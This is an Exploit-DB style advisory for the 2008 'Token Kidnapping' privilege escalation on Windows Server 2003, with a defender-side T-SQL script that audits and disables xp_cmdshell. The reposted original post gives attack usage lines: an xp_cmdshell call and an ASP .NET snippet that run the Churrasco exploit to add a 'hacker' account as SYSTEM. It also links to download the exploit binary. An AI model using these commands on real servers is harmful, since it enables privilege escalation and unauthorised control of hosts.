Vendor: Windows Server 2003
By: Cesar
CVSS: 7.2 (HIGH)
Title: Token Kidnapping
CWE: 264
Product Name: Windows Server 2003
Affected Version From: Windows 2003
Affected Version To: Windows 2003
Patch Exists: No
Related CWE: N/A
CPE: o:microsoft:windows_server_2003
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2008

Windows 2003 PoC Exploit for Token Kidnapping

This exploit allows an attacker to execute code under the SYSTEM account on Windows 2003. This is possible because Windows service accounts can impersonate other processes, as can IIS 6 worker processes. If an attacker can run code from an ASP .NET or classic ASP web application, they can own Windows. Additionally, if an attacker has access to a SQL Server, they can execute the exploit using xp_cmdshell. The PoC exploit can be found at http://www.argeniss.com/research/Churrasco.zip

Mitigation:

Restrict user access to ASP .NET and classic ASP web applications, and limit access to SQL Server.
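As an added, defender-side example that is not part of the original post or the Churrasco PoC: the following T-SQL audits the two preconditions the xp_cmdshell path relies on (xp_cmdshell enabled, and logins holding sysadmin) and then disables xp_cmdshell. It assumes SQL Server 2005 or later, where sys.configurations and sys.server_principals exist.

```sql
-- Added audit/hardening script (not from the original post).
-- 1. Is xp_cmdshell enabled? value_in_use = 1 means any sysadmin can run OS
--    commands as the SQL Server service account, which is what the PoC needs.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Which logins are sysadmin? Each of these can reach xp_cmdshell, and so
--    the service account's token, without any further exploit.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
ORDER BY sp.name;

-- 3. Disable xp_cmdshell. 'show advanced options' must be on to change it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Re-check: value_in_use should now be 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
```

Disabling xp_cmdshell removes this particular launch path only; anyone who can still run code as the service account (a sysadmin by other means, or an IIS worker process) retains the impersonation capability the post describes, so the sysadmin membership list is the more important output to review.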

Exploit-DB raw data:

(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) 
was published so I decided to release a PoC exploit for Win2k3 that allows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows 
services accounts can impersonate.  Other processes (not services) that can impersonate are IIS 6 worker processes 
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide 
shared hosting services then I would recommend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip (2008-Churrasco.zip)

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]